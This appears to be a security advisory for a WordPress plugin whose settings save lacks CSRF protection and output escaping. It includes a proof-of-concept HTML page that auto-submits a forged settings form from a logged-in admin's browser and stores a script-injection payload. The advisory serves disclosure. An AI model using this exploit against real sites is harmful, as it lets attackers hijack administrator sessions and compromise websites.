The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
<input type="hidden" name="fca_pc[has_save]" value="1" />
<input type="hidden" name="fca_pc_save" value="1" />
<input type="hidden" name="fca[trigger_type]" value="post" />
<input type="hidden" name="fca_pc[event_name]" value="" />
<input type="hidden" name="fca_pc[value]" value="" />
<input type="hidden" name="fca_pc[currency]" value="" />
<input type="hidden" name="fca_pc[content_name]" value="" />
<input type="hidden" name="fca_pc[content_type]" value="product" />
<input type="hidden" name="fca_pc[content_ids]" value="" />
<input type="hidden" name="fca_pc[content_category]" value="" />
<input type="hidden" name="fca_pc[search_string]" value="" />
<input type="hidden" name="fca_pc[num_items]" value="" />
<input type="hidden" name="fca_pc[status]" value="" />
<input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
<input type="submit" value="submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>